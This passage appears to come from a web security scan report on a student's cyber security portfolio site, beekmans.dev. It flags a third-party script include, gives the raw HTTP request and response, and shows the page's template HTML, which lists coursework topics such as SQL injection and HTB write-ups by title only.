          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Parameter
          https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js
          Evidence
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          Solution

          Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.

        2. GET https://beekmans.dev/
          Alert tags
          Alert description

          The page includes one or more script files from a third-party domain.

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
